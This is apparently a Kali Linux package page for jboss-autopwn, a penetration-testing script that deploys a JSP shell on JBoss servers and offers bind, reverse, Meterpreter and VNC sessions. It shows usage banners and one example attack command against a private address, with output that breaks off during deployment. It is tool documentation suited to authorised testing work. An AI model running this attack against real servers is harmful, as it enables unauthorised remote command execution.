jboss-autopwn Package Description

This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Features include:

  • Multiplatform support – tested on Windows, Linux and Mac targets
  • Support for bind and reverse bind shells
  • Meterpreter shells and VNC support for Windows targets

Source: https://github.com/SpiderLabs/jboss-autopwn
jboss-autopwn Homepage | Kali jboss-autopwn Repo

  • Author: Christian G. Papathanasiou, Trustwave Holdings, Inc.
  • License: GPLv2

Tools included in the jboss-autopwn package

jboss-win – JBoss Windows autopwn
[email protected]:~# [email protected]:~# jboss-win
[!] JBoss Windows autopwn
[!] Usage: ./e2.sh server port
[!] Christian Papathanasiou [email protected]
[!] Trustwave SpiderLabs

jboss-linux – JBoss *nix autopwn

[email protected]:~# jboss-linux
[!] JBoss *nix autopwn
[!] Usage: ./e.sh server port
[!] Christian Papathanasiou
[!] Trustwave SpiderLabs

jboss-autopwn Usage Example

Attack the target server (192.168.1.200) on the specified port (8080), redirecting stderr (2> /dev/null):

[email protected]:~# jboss-linux 192.168.1.200 8080 2> /dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[!] Cound not create BSH script..
[x] Now deploying .war file: